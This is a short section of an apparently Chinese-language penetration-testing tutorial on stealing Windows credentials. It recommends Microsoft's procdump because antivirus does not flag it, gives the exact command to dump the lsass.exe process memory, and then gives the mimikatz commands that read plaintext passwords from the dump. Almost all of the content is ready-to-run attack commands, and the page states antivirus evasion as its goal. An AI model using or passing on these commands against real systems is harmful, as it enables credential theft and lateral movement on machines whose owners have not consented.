### 4.1.2 procdump+mimikatz
Procdump 是微软官方发布的一款调试工具,因此不会被各种杀毒软件查杀。可使用 procdump 加 mimikatz 来躲避杀软检测。
官方下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
#### 1、使用 procdump 将目标的 lsass.exe 转储成 dmp 文件
“`bash
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
“`
#### 2、使用 mimikatz 从转储的 lsass.dmp 中来读取明文密码
“`bash
mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full”
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容